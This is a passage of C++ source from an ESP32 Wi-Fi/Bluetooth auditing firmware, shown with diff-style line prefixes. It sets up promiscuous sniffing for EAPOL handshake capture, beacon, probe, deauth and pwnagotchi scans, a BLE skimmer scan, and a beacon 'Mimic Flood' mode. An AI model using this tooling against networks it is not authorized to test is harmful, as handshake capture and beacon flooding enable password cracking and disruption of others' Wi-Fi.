- display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
- display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
- #endif
-
- esp_wifi_init(&cfg);
- esp_wifi_set_storage(WIFI_STORAGE_RAM);
- esp_wifi_set_mode(WIFI_MODE_NULL);
- esp_wifi_start();
- esp_wifi_set_promiscuous(true);
- esp_wifi_set_promiscuous_filter(&filt);
- esp_wifi_set_promiscuous_rx_cb(&espressifSnifferCallback);
- esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
- this->wifi_initialized = true;
- initTime = millis();
- }
- void WiFiScan::RunPacketMonitor(uint8_t scan_mode, uint16_t color)
- {
- #ifdef MARAUDER_FLIPPER
- flipper_led.sniffLED();
- #endif
- sd_obj.openCapture("packet_monitor");
- #ifndef MARAUDER_MINI
-
- #ifdef HAS_SCREEN
- display_obj.tft.init();
- display_obj.tft.setRotation(1);
- display_obj.tft.fillScreen(TFT_BLACK);
- #endif
-
- #ifdef HAS_SCREEN
- #ifdef TFT_SHIELD
- uint16_t calData[5] = { 391, 3491, 266, 3505, 7 }; // Landscape TFT Shield
- Serial.println("Using TFT Shield");
- #else if defined(TFT_DIY)
- uint16_t calData[5] = { 213, 3469, 320, 3446, 1 }; // Landscape TFT DIY
- Serial.println("Using TFT DIY");
- #endif
- display_obj.tft.setTouch(calData);
-
- //display_obj.tft.setFreeFont(1);
- display_obj.tft.setFreeFont(NULL);
- display_obj.tft.setTextSize(1);
- display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK); // Buttons
- display_obj.tft.fillRect(12, 0, 90, 32, TFT_BLACK); // color key
-
- delay(10);
-
- display_obj.tftDrawGraphObjects(x_scale); //draw graph objects
- display_obj.tftDrawColorKey();
- display_obj.tftDrawXScaleButtons(x_scale);
- display_obj.tftDrawYScaleButtons(y_scale);
- display_obj.tftDrawChannelScaleButtons(set_channel);
- display_obj.tftDrawExitScaleButtons();
- #endif
- #else
- #ifdef HAS_SCREEN
- display_obj.TOP_FIXED_AREA_2 = 48;
- display_obj.tteBar = true;
- display_obj.print_delay_1 = 15;
- display_obj.print_delay_2 = 10;
- display_obj.initScrollValues(true);
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setTextColor(TFT_WHITE, color);
- #ifndef MARAUDER_MINI
- display_obj.tft.fillRect(0,16,240,16, color);
- display_obj.tft.drawCentreString(text_table4[38],120,16,2);
- display_obj.touchToExit();
- #endif
- display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
- display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
- #endif
- #endif
- Serial.println("Running packet scan...");
- esp_wifi_init(&cfg);
- esp_wifi_set_storage(WIFI_STORAGE_RAM);
- esp_wifi_set_mode(WIFI_MODE_NULL);
- esp_wifi_start();
- esp_wifi_set_promiscuous(true);
- esp_wifi_set_promiscuous_filter(&filt);
- esp_wifi_set_promiscuous_rx_cb(&wifiSnifferCallback);
- esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
- this->wifi_initialized = true;
- uint32_t initTime = millis();
- }
- void WiFiScan::RunEapolScan(uint8_t scan_mode, uint16_t color)
- {
- #ifdef MARAUDER_FLIPPER
- flipper_led.sniffLED();
- #endif
-
- num_eapol = 0;
- #ifndef MARAUDER_MINI
- #ifdef HAS_SCREEN
- display_obj.tft.init();
- display_obj.tft.setRotation(1);
- display_obj.tft.fillScreen(TFT_BLACK);
- #endif
-
- sd_obj.openCapture("eapol");
-
- #ifdef HAS_SCREEN
- #ifdef TFT_SHIELD
- uint16_t calData[5] = { 391, 3491, 266, 3505, 7 }; // Landscape TFT Shield
- //Serial.println("Using TFT Shield");
- #else if defined(TFT_DIY)
- uint16_t calData[5] = { 213, 3469, 320, 3446, 1 }; // Landscape TFT DIY
- //Serial.println("Using TFT DIY");
- #endif
- display_obj.tft.setTouch(calData);
-
- display_obj.tft.setFreeFont(NULL);
- display_obj.tft.setTextSize(1);
- display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK); // Buttons
- display_obj.tft.fillRect(12, 0, 90, 32, TFT_BLACK); // color key
-
- delay(10);
-
- display_obj.tftDrawGraphObjects(x_scale); //draw graph objects
- display_obj.tftDrawEapolColorKey();
- display_obj.tftDrawChannelScaleButtons(set_channel);
- display_obj.tftDrawExitScaleButtons();
- #endif
- #else
- sd_obj.openCapture("eapol");
-
- #ifdef HAS_SCREEN
- display_obj.TOP_FIXED_AREA_2 = 48;
- display_obj.tteBar = true;
- display_obj.print_delay_1 = 15;
- display_obj.print_delay_2 = 10;
- display_obj.initScrollValues(true);
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setTextColor(TFT_WHITE, color);
- #ifndef MARAUDER_MINI
- display_obj.tft.fillRect(0,16,240,16, color);
- display_obj.tft.drawCentreString(text_table4[38],120,16,2);
- display_obj.touchToExit();
- #endif
- display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
- display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
- #endif
- #endif
- esp_wifi_init(&cfg);
- esp_wifi_set_storage(WIFI_STORAGE_RAM);
- esp_wifi_set_mode(WIFI_MODE_AP);
- esp_err_t err;
- wifi_config_t conf;
- err = esp_wifi_set_protocol(WIFI_IF_AP, WIFI_PROTOCOL_11B | WIFI_PROTOCOL_11G | WIFI_PROTOCOL_11N | WIFI_PROTOCOL_LR);
- if (err != 0)
- {
- Serial.print("could not set protocol : err=0x");
- Serial.println(err, HEX);
- }
- esp_wifi_get_config((wifi_interface_t)WIFI_IF_AP, &conf);
- conf.ap.ssid[0] = '\0';
- conf.ap.ssid_len = 0;
- conf.ap.channel = this->set_channel;
- conf.ap.ssid_hidden = 1;
- conf.ap.max_connection = 0;
- conf.ap.beacon_interval = 60000;
- err = esp_wifi_set_config((wifi_interface_t)WIFI_IF_AP, &conf);
- if (err != 0)
- {
- Serial.print("AP config set error, Maurauder SSID might visible : err=0x");
- Serial.println(err, HEX);
- }
- esp_wifi_start();
- esp_wifi_set_promiscuous(true);
- esp_wifi_set_promiscuous_filter(&filt);
- if (scan_mode == WIFI_SCAN_ACTIVE_EAPOL)
- esp_wifi_set_promiscuous_rx_cb(&activeEapolSnifferCallback);
- else
- esp_wifi_set_promiscuous_rx_cb(&eapolSnifferCallback);
- esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
- this->wifi_initialized = true;
- initTime = millis();
- }
- // Function to prepare for beacon mimic
- void WiFiScan::RunMimicFlood(uint8_t scan_mode, uint16_t color) {
- #ifdef HAS_SCREEN
- display_obj.TOP_FIXED_AREA_2 = 48;
- display_obj.tteBar = true;
- display_obj.print_delay_1 = 15;
- display_obj.print_delay_2 = 10;
- display_obj.initScrollValues(true);
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setTextColor(TFT_BLACK, color);
- #ifndef MARAUDER_MINI
- display_obj.tft.fillRect(0,16,240,16, color);
- display_obj.tft.drawCentreString(" Mimic Flood ",120,16,2);
- display_obj.touchToExit();
- #endif
- display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
- #endif
-
- packets_sent = 0;
- esp_wifi_init(&cfg);
- esp_wifi_set_storage(WIFI_STORAGE_RAM);
- esp_wifi_set_mode(WIFI_AP_STA);
- esp_wifi_start();
- esp_wifi_set_promiscuous_filter(NULL);
- esp_wifi_set_promiscuous(true);
- esp_wifi_set_max_tx_power(78);
- this->wifi_initialized = true;
- initTime = millis();
- }
- void WiFiScan::RunPwnScan(uint8_t scan_mode, uint16_t color)
- {
- sd_obj.openCapture("pwnagotchi");
- #ifdef MARAUDER_FLIPPER
- flipper_led.sniffLED();
- #endif
- #ifdef HAS_SCREEN
- display_obj.TOP_FIXED_AREA_2 = 48;
- display_obj.tteBar = true;
- display_obj.print_delay_1 = 15;
- display_obj.print_delay_2 = 10;
- display_obj.initScrollValues(true);
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setTextColor(TFT_WHITE, color);
- #ifndef MARAUDER_MINI
- display_obj.tft.fillRect(0,16,240,16, color);
- display_obj.tft.drawCentreString(text_table4[37],120,16,2);
- display_obj.touchToExit();
- #endif
- display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
- display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
- #endif
-
- esp_wifi_init(&cfg);
- esp_wifi_set_storage(WIFI_STORAGE_RAM);
- esp_wifi_set_mode(WIFI_MODE_NULL);
- esp_wifi_start();
- esp_wifi_set_promiscuous(true);
- esp_wifi_set_promiscuous_filter(&filt);
- esp_wifi_set_promiscuous_rx_cb(&pwnSnifferCallback);
- esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
- this->wifi_initialized = true;
- initTime = millis();
- }
- // Function to start running a beacon scan
- void WiFiScan::RunBeaconScan(uint8_t scan_mode, uint16_t color)
- {
- sd_obj.openCapture("beacon");
- #ifdef MARAUDER_FLIPPER
- flipper_led.sniffLED();
- #endif
-
- #ifdef HAS_SCREEN
- display_obj.TOP_FIXED_AREA_2 = 48;
- display_obj.tteBar = true;
- display_obj.print_delay_1 = 15;
- display_obj.print_delay_2 = 10;
- display_obj.initScrollValues(true);
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setTextColor(TFT_WHITE, color);
- #ifndef MARAUDER_MINI
- display_obj.tft.fillRect(0,16,240,16, color);
- display_obj.tft.drawCentreString(text_table4[38],120,16,2);
- display_obj.touchToExit();
- #endif
- display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
- display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
- #endif
-
- esp_wifi_init(&cfg);
- esp_wifi_set_storage(WIFI_STORAGE_RAM);
- esp_wifi_set_mode(WIFI_MODE_NULL);
- esp_wifi_start();
- esp_wifi_set_promiscuous(true);
- esp_wifi_set_promiscuous_filter(&filt);
- esp_wifi_set_promiscuous_rx_cb(&beaconSnifferCallback);
- esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
- this->wifi_initialized = true;
- initTime = millis();
- }
- void WiFiScan::RunDeauthScan(uint8_t scan_mode, uint16_t color)
- {
- sd_obj.openCapture("deauth");
- #ifdef MARAUDER_FLIPPER
- flipper_led.sniffLED();
- #endif
-
- #ifdef HAS_SCREEN
- display_obj.TOP_FIXED_AREA_2 = 48;
- display_obj.tteBar = true;
- display_obj.print_delay_1 = 15;
- display_obj.print_delay_2 = 10;
- display_obj.initScrollValues(true);
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setTextColor(TFT_BLACK, color);
- #ifndef MARAUDER_MINI
- display_obj.tft.fillRect(0,16,240,16, color);
- display_obj.tft.drawCentreString(text_table4[39],120,16,2);
- display_obj.touchToExit();
- #endif
- display_obj.tft.setTextColor(TFT_RED, TFT_BLACK);
- display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
- #endif
-
- esp_wifi_init(&cfg);
- esp_wifi_set_storage(WIFI_STORAGE_RAM);
- esp_wifi_set_mode(WIFI_MODE_NULL);
- esp_wifi_start();
- esp_wifi_set_promiscuous(true);
- esp_wifi_set_promiscuous_filter(&filt);
- esp_wifi_set_promiscuous_rx_cb(&deauthSnifferCallback);
- esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
- this->wifi_initialized = true;
- initTime = millis();
- }
- // Function for running probe request scan
- void WiFiScan::RunProbeScan(uint8_t scan_mode, uint16_t color)
- {
- sd_obj.openCapture("probe");
- #ifdef MARAUDER_FLIPPER
- flipper_led.sniffLED();
- #endif
-
- #ifdef HAS_SCREEN
- display_obj.TOP_FIXED_AREA_2 = 48;
- display_obj.tteBar = true;
- display_obj.print_delay_1 = 15;
- display_obj.print_delay_2 = 10;
- display_obj.initScrollValues(true);
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setTextColor(TFT_BLACK, color);
- #ifndef MARAUDER_MINI
- display_obj.tft.fillRect(0,16,240,16, color);
- display_obj.tft.drawCentreString(text_table4[40],120,16,2);
- display_obj.touchToExit();
- #endif
- display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
- display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
- #endif
-
- esp_wifi_init(&cfg);
- esp_wifi_set_storage(WIFI_STORAGE_RAM);
- esp_wifi_set_mode(WIFI_MODE_NULL);
- esp_wifi_start();
- esp_wifi_set_promiscuous(true);
- esp_wifi_set_promiscuous_filter(&filt);
- esp_wifi_set_promiscuous_rx_cb(&probeSnifferCallback);
- esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
- this->wifi_initialized = true;
- initTime = millis();
- }
- // Function to start running any BLE scan
- void WiFiScan::RunBluetoothScan(uint8_t scan_mode, uint16_t color)
- {
- #ifdef HAS_BT
- #ifdef HAS_SCREEN
- display_obj.print_delay_1 = 50;
- display_obj.print_delay_2 = 20;
- #endif
-
- NimBLEDevice::setScanFilterMode(CONFIG_BTDM_SCAN_DUPL_TYPE_DEVICE);
- NimBLEDevice::setScanDuplicateCacheSize(200);
- NimBLEDevice::init("");
- pBLEScan = NimBLEDevice::getScan(); //create new scan
- if (scan_mode == BT_SCAN_ALL)
- {
- #ifdef HAS_SCREEN
- display_obj.TOP_FIXED_AREA_2 = 48;
- display_obj.tteBar = true;
- display_obj.initScrollValues(true);
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setTextColor(TFT_BLACK, color);
- #ifndef MARAUDER_MINI
- display_obj.tft.fillRect(0,16,240,16, color);
- display_obj.tft.drawCentreString(text_table4[41],120,16,2);
- display_obj.touchToExit();
- #endif
- display_obj.tft.setTextColor(TFT_CYAN, TFT_BLACK);
- display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
- #endif
- pBLEScan->setAdvertisedDeviceCallbacks(new bluetoothScanAllCallback(), false);
- }
- else if (scan_mode == BT_SCAN_SKIMMERS)
- {
- #ifdef HAS_SCREEN
- display_obj.TOP_FIXED_AREA_2 = 160;
- display_obj.tteBar = true;
- display_obj.tft.fillScreen(TFT_DARKGREY);
- display_obj.initScrollValues(true);
- display_obj.tft.setTextWrap(false);
- display_obj.tft.setTextColor(TFT_BLACK, color);
- display_obj.tft.fillRect(0,16,240,16, color);
- display_obj.tft.drawCentreString(text_table4[42],120,16,2);
- display_obj.twoPartDisplay(text_table4[43]);
- display_obj.tft.setTextColor(TFT_BLACK, TFT_DARKGREY);
- display_obj.setupScrollArea(display_obj.TOP_FIXED_AREA_2, BOT_FIXED_AREA);
- #endif
- pBLEScan->setAdvertisedDeviceCallbacks(new bluetoothScanSkimmersCallback(), false);
- }
- pBLEScan->setActiveScan(true); //active scan uses more power, but get results faster
- pBLEScan->setInterval(97);
- pBLEScan->setWindow(37); // less or equal setInterval value
- pBLEScan->setMaxResults(0);
- pBLEScan->start(0, scanCompleteCB, false);
- Serial.println("Started BLE Scan");
- this->ble_initialized = true;
- initTime = millis();
- #endif
- }
- // Function that is called when BLE scan is completed
- #ifdef HAS_BT
- void WiFiScan::scanCompleteCB(BLEScanResults scanResults) {
- printf("Scan complete!\n");
- printf("Found %d devices\n", scanResults.getCount());
- scanResults.dump();
- } // scanCompleteCB
- #endif
- // Function to extract MAC addr from a packet at given offset
- void WiFiScan::getMAC(char *addr, uint8_t* data, uint16_t offset) {
- sprintf(addr, "%02x:%02x:%02x:%02x:%02x:%02x", data[offset+0], data[offset+1], data[offset+2], data[offset+3], data[offset+4], data[offset+5]);
- }
- void WiFiScan::espressifSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
- {
- bool save_packet = settings_obj.loadSetting<bool>(text_table4[7]);
-
- wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
- WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
- wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
- int len = snifferPacket->rx_ctrl.sig_len;
- String display_string = "";
- String src_addr_string = "";
- if (type == WIFI_PKT_MGMT)
- {
- len -= 4;
- }
- int fctl = ntohs(frameControl->fctl);
- const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
- const WifiMgmtHdr *hdr = &ipkt->hdr;
- // If we dont the buffer size is not 0, don't write or else we get CORRUPT_HEAP
- //if ((snifferPacket->payload[0] == 0x80) && (display_obj.display_buffer->size() == 0))
- //{
- char addr[] = "00:00:00:00:00:00";
- getMAC(addr, snifferPacket->payload, 10);
- src_addr_string.concat(addr);
- bool match = false;
- for (int i = 0; i < (sizeof(espressif_macs) / sizeof(espressif_macs[0])); i++) {
- if (src_addr_string.startsWith(espressif_macs[i])) {
- match = true;
- break;
- }
- }
-
- if (!match)
- return;
- delay(random(0, 10));
- Serial.print("RSSI: ");
- Serial.print(snifferPacket->rx_ctrl.rssi);
- Serial.print(" Ch: ");
- Serial.print(snifferPacket->rx_ctrl.channel);
- Serial.print(" BSSID: ");
-
- Serial.print(addr);
- //display_string.concat(" RSSI: ");
- //display_string.concat(snifferPacket->rx_ctrl.rssi);
- display_string.concat("CH: " + (String)snifferPacket->rx_ctrl.channel);
- //display_string.concat(" ");
- display_string.concat(" -> ");
- display_string.concat(addr);
- for (int i = 0; i < 19 - snifferPacket->payload[37]; i++)
- {
- display_string.concat(" ");
- }
- Serial.print(" ");
- #ifdef HAS_SCREEN
- display_obj.loading = true;
- display_obj.display_buffer->add(display_string);
- display_obj.loading = false;
- #endif
-
-
- Serial.println();
- if (save_packet)
- sd_obj.addPacket(snifferPacket->payload, len);
- //}
- }
- void WiFiScan::pwnSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
- {
- bool save_packet = settings_obj.loadSetting<bool>(text_table4[7]);
-
- wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
- WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
- wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
- int len = snifferPacket->rx_ctrl.sig_len;
- String display_string = "";
- String src = "";
- String essid = "";
- if (type == WIFI_PKT_MGMT)
- {
- len -= 4;
- int fctl = ntohs(frameControl->fctl);
- const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
- const WifiMgmtHdr *hdr = &ipkt->hdr;
- // If we dont the buffer size is not 0, don't write or else we get CORRUPT_HEAP
- #ifdef HAS_SCREEN
- int buf = display_obj.display_buffer->size();
- #else
- int buf = 0;
- #endif
-
- if ((snifferPacket->payload[0] == 0x80) && (buf == 0))
- {
- char addr[] = "00:00:00:00:00:00";
- getMAC(addr, snifferPacket->payload, 10);
- src.concat(addr);
- if (src == "de:ad:be:ef:de:ad") {
-
-
- delay(random(0, 10));
- Serial.print("RSSI: ");
- Serial.print(snifferPacket->rx_ctrl.rssi);
- Serial.print(" Ch: ");
- Serial.print(snifferPacket->rx_ctrl.channel);
- Serial.print(" BSSID: ");
- Serial.print(addr);
- //display_string.concat(addr);
- display_string.concat("CH: " + (String)snifferPacket->rx_ctrl.channel);
- Serial.print(" ESSID: ");
- display_string.concat(" -> ");
- // Just grab the first 255 bytes of the pwnagotchi beacon
- // because that is where the name is
- //for (int i = 0; i < snifferPacket->payload[37]; i++)
- for (int i = 0; i < len - 37; i++)
- {
- Serial.print((char)snifferPacket->payload[i + 38]);
- //display_string.concat((char)snifferPacket->payload[i + 38]);
- if (isAscii(snifferPacket->payload[i + 38]))
- essid.concat((char)snifferPacket->payload[i + 38]);
- else
- Serial.println("Got non-ascii character: " + (String)(char)snifferPacket->payload[i + 38]);
- }
- //essid.concat("\": \"\"}}");
- //Serial.println("\n" + (String)(snifferPacket->payload[37]) + " -> " + essid);
- // Load json
- //DynamicJsonBuffer jsonBuffer; // ArduinoJson v5
- DynamicJsonDocument json(1024); // ArduinoJson v6
- //JsonObject& json = jsonBuffer.parseObject(essid); // ArduinoJson v5
- // ArduinoJson v6
- if (deserializeJson(json, essid)) {
- Serial.println("\nCould not parse Pwnagotchi json");
- display_string.concat(essid);
- }
- else {
- Serial.println("\nSuccessfully parsed json");
- String json_output;
- //json.printTo(json_output); // ArduinoJson v5
- serializeJson(json, json_output); // ArduinoJson v6
- Serial.println(json_output);
- display_string.concat(json["name"].as<String>() + " pwnd: " + json["pwnd_tot"].as<String>());
- }
-
- int temp_len = display_string.length();
- for (int i = 0; i < 40 - temp_len; i++)
- {
- display_string.concat(" ");
- }
-
- Serial.print(" ");
- #ifdef HAS_SCREEN
- if (display_obj.display_buffer->size() == 0)
- {
- display_obj.loading = true;
- display_obj.display_buffer->add(display_string);
- display_obj.loading = false;
- }
- #endif
-
-
-
- Serial.println();
- if (save_packet)
- sd_obj.addPacket(snifferPacket->payload, len);
- }
- }
- }
- }
- void WiFiScan::apSnifferCallbackFull(void* buf, wifi_promiscuous_pkt_type_t type) {
- bool save_packet = settings_obj.loadSetting<bool>(text_table4[7]);
-
- wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
- WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
- wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
- int len = snifferPacket->rx_ctrl.sig_len;
- String display_string = "";
- String essid = "";
- String bssid = "";
- if (type == WIFI_PKT_MGMT)
- {
- len -= 4;
- int fctl = ntohs(frameControl->fctl);
- const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
- const WifiMgmtHdr *hdr = &ipkt->hdr;
- // If we dont the buffer size is not 0, don't write or else we get CORRUPT_HEAP
- #ifdef HAS_SCREEN
- int buf = display_obj.display_buffer->size();
- #else
- int buf = 0;
- #endif
- if ((snifferPacket->payload[0] == 0x80) && (buf == 0))
- {
- char addr[] = "00:00:00:00:00:00";
- getMAC(addr, snifferPacket->payload, 10);
- bool in_list = false;
- bool mac_match = true;
- for (int i = 0; i < access_points->size(); i++) {
- mac_match = true;
- //Serial.print("Checking ");
- //Serial.print(addr);
- //Serial.println(" against " + (String)access_points->get(i).essid);
-
- for (int x = 0; x < 6; x++) {
- //Serial.println((String)snifferPacket->payload[x + 10] + " | " + (String)access_points->get(i).bssid[x]);
- if (snifferPacket->payload[x + 10] != access_points->get(i).bssid[x]) {
- mac_match = false;
- //Serial.println("MACs do not match");
- break;
- }
- }
- if (mac_match) {
- in_list = true;
- break;
- }
- }
- if (!in_list) {
-
- delay(random(0, 10));
- Serial.print("RSSI: ");
- Serial.print(snifferPacket->rx_ctrl.rssi);
- Serial.print(" Ch: ");
- Serial.print(snifferPacket->rx_ctrl.channel);
- Serial.print(" BSSID: ");
- Serial.print(addr);
- display_string.concat(addr);
- Serial.print(" ESSID: ");
- display_string.concat(" -> ");
- for (int i = 0; i < snifferPacket->payload[37]; i++)
- {
- Serial.print((char)snifferPacket->payload[i + 38]);
- display_string.concat((char)snifferPacket->payload[i + 38]);
- essid.concat((char)snifferPacket->payload[i + 38]);
-
- }
- bssid.concat(addr);
-
- int temp_len = display_string.length();
- for (int i = 0; i < 40 - temp_len; i++)
- {
- display_string.concat(" ");
- }
-
- Serial.print(" ");
- #ifdef HAS_SCREEN
- if (display_obj.display_buffer->size() == 0)
- {
- display_obj.loading = true;
- display_obj.display_buffer->add(display_string);
- display_obj.loading = false;
- }
- #endif
-
- if (essid == "") {
- essid = bssid;
- Serial.print(essid + " ");
- }
- //LinkedList<char> beacon = new LinkedList<char>();
-
- /*AccessPoint ap = {essid,
- snifferPacket->rx_ctrl.channel,
- {snifferPacket->payload[10],
- snifferPacket->payload[11],
- snifferPacket->payload[12],
- snifferPacket->payload[13],
- snifferPacket->payload[14],
- snifferPacket->payload[15]},
- false,
- NULL};*/
- AccessPoint ap;
- ap.essid = essid;
- ap.channel = snifferPacket->rx_ctrl.channel;
- ap.bssid[0] = snifferPacket->payload[10];
- ap.bssid[1] = snifferPacket->payload[11];
- ap.bssid[2] = snifferPacket->payload[12];
- ap.bssid[3] = snifferPacket->payload[13];
- ap.bssid[4] = snifferPacket->payload[14];
- ap.bssid[5] = snifferPacket->payload[15];
- ap.selected = false;
-
- ap.beacon = new LinkedList<char>();
- //for (int i = 0; i < len; i++) {
- // ap.beacon->add(snifferPacket->payload[i]);
- //}
- ap.beacon->add(snifferPacket->payload[34]);
- ap.beacon->add(snifferPacket->payload[35]);
- Serial.print("\nBeacon: ");
- for (int i = 0; i < ap.beacon->size(); i++) {
- char hexCar[4];
- sprintf(hexCar, "%02X", ap.beacon->get(i));
- Serial.print(hexCar);
- if ((i + 1) % 16 == 0)
- Serial.print("\n");
- else
- Serial.print(" ");
- }
- ap.rssi = snifferPacket->rx_ctrl.rssi;
- access_points->add(ap);
- Serial.print(access_points->size());
- Serial.println();
- if (save_packet)
- sd_obj.addPacket(snifferPacket->payload, len);
- }
- }
- }
- }
- void WiFiScan::apSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
- {
- bool save_packet = settings_obj.loadSetting<bool>(text_table4[7]);
-
- wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
- WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
- wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
- int len = snifferPacket->rx_ctrl.sig_len;
- String display_string = "";
- String essid = "";
- String bssid = "";
- if (type == WIFI_PKT_MGMT)
- {
- len -= 4;
- int fctl = ntohs(frameControl->fctl);
- const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
- const WifiMgmtHdr *hdr = &ipkt->hdr;
- // If we dont the buffer size is not 0, don't write or else we get CORRUPT_HEAP
- #ifdef HAS_SCREEN
- int buf = display_obj.display_buffer->size();
- #else
- int buf = 0;
- #endif
- if ((snifferPacket->payload[0] == 0x80) && (buf == 0))
- {
- char addr[] = "00:00:00:00:00:00";
- getMAC(addr, snifferPacket->payload, 10);
- bool in_list = false;
- bool mac_match = true;
- for (int i = 0; i < access_points->size(); i++) {
- mac_match = true;
- //Serial.print("Checking ");
- //Serial.print(addr);
- //Serial.println(" against " + (String)access_points->get(i).essid);
-
- for (int x = 0; x < 6; x++) {
- //Serial.println((String)snifferPacket->payload[x + 10] + " | " + (String)access_points->get(i).bssid[x]);
- if (snifferPacket->payload[x + 10] != access_points->get(i).bssid[x]) {
- mac_match = false;
- //Serial.println("MACs do not match");
- break;
- }
- }
- if (mac_match) {
- in_list = true;
- break;
- }
- }
- if (!in_list) {
-
- delay(random(0, 10));
- Serial.print("RSSI: ");
- Serial.print(snifferPacket->rx_ctrl.rssi);
- Serial.print(" Ch: ");
- Serial.print(snifferPacket->rx_ctrl.channel);
- Serial.print(" BSSID: ");
- Serial.print(addr);
- display_string.concat(addr);
- Serial.print(" ESSID: ");
- display_string.concat(" -> ");
- for (int i = 0; i < snifferPacket->payload[37]; i++)
- {
- Serial.print((char)snifferPacket->payload[i + 38]);
- display_string.concat((char)snifferPacket->payload[i + 38]);
- essid.concat((char)snifferPacket->payload[i + 38]);
-
- }
- bssid.concat(addr);
-
- int temp_len = display_string.length();
- for (int i = 0; i < 40 - temp_len; i++)
- {
- display_string.concat(" ");
- }
-
- Serial.print(" ");
- #ifdef HAS_SCREEN
- if (display_obj.display_buffer->size() == 0)
- {
- display_obj.loading = true;
- display_obj.display_buffer->add(display_string);
- display_obj.loading = false;
- }
- #endif
-
- if (essid == "") {
- essid = bssid;
- Serial.print(essid + " ");
- }
-
- AccessPoint ap = {essid,
- snifferPacket->rx_ctrl.channel,
- {snifferPacket->payload[10],
- snifferPacket->payload[11],
- snifferPacket->payload[12],
- snifferPacket->payload[13],
- snifferPacket->payload[14],
- snifferPacket->payload[15]},
- false,
- NULL,
- snifferPacket->rx_ctrl.rssi};
- access_points->add(ap);
- Serial.print(access_points->size());
- Serial.println();
- if (save_packet)
- sd_obj.addPacket(snifferPacket->payload, len);
- }
- }
- }
- }
- void WiFiScan::beaconSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type)
- {
- bool save_packet = settings_obj.loadSetting<bool>(text_table4[7]);
-
- wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
- WifiMgmtHdr *frameControl = (WifiMgmtHdr*)snifferPacket->payload;
- wifi_pkt_rx_ctrl_t ctrl = (wifi_pkt_rx_ctrl_t)snifferPacket->rx_ctrl;
- int len = snifferPacket->rx_ctrl.sig_len;
- String display_string = "";
- if (type == WIFI_PKT_MGMT)
- {
- len -= 4;
- int fctl = ntohs(frameControl->fctl);
- const wifi_ieee80211_packet_t *ipkt = (wifi_ieee80211_packet_t *)snifferPacket->payload;
- const WifiMgmtHdr *hdr = &ipkt->hdr;
- // If we dont the buffer size is not 0, don't write or else we get CORRUPT_HEAP
- #ifdef HAS_SCREEN
- int buf = display_obj.display_buffer->size();
- #else
- int buf = 0;
- #endif
- if ((snifferPacket->payload[0] == 0x80) && (buf == 0))
- {
- delay(random(0, 10));
- Serial.print("RSSI: ");
- Serial.print(snifferPacket->rx_ctrl.rssi);
- Serial.print(" Ch: ");
- Serial.print(snifferPacket->rx_ctrl.channel);
- Serial.print(" BSSID: ");
- char addr[] = "00:00:00:00:00:00";
- getMAC(addr, snifferPacket->payload, 10);
- Serial.print(addr);
- display_string.concat(addr);
- Serial.print(" ESSID: ");
- display_string.concat(" -> ");
